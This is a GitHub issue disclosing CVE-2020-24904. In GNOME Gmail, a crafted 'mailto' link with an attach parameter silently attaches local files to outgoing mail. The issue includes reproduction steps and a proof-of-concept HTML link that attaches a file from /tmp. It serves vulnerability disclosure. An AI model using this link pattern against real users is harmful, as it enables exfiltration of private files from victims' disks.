CVE-2020-24904: Security issue · Issue #84 · davesteele/gnome-gmail
An issue was discovered in the attach parameter in GNOME Gmail version 2.5.4, which allows remote attackers to gain sensitive information via a crafted “mailto” link.
Following the email conversation with David, I am raising this security issue as agreed (or, some might say, a feature/expected behavior).
Summary
By using the “mailto?attach=…” parameter, a website can make GNOME Gmail attach local files to an email message without showing a warning to the user; additionally, when the user writes the email, on some systems they can’t see that there is an attachment. Please see test.gif for a demonstration.
To summarize, it is an analog of CVE-2020-11879 in GNOME Evolution, KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089), and Pegasus Mail. https://twitter.com/jensvoid/status/1295357952480751616 Jens originally found this type of issue in email clients. As Jens wrote in the bugzilla report 613425, I quote: "This is arguably a dangerous feature because it allows an attacker to exfiltrate arbitrary files on disk (and also email from the victim’s IMAP account), if the victim sends an email based on attacker controlled mailto input and misses the attachment being added."
How to reproduce
- Have the GNOME Gmail client installed on Ubuntu and set GNOME Gmail and Chrome as the defaults (I tested on Ubuntu 20.04 and 18.04.4 with the latest stable Chrome)
- Copy Tux.png to /tmp directory
- Open test.html
- Click “Send email”
- In GNOME Gmail, fill in the “To” and “Subject” fields
- Click send
test.html
<html>
<body>
<p>POC test</p>
<p><a href="mailto:[email protected]?attach=/tmp/Tux.png">Send email</a></p>
</body>
</html>
Tux.png: https://en.wikipedia.org/wiki/File:Tux.png
Additional information
On Ubuntu 18.04.4 with Chrome version 83.0.4103.116, the attachment isn’t shown, as you can see in the demo above.
On Ubuntu 20.04 with the latest stable Chrome, the attachment is shown.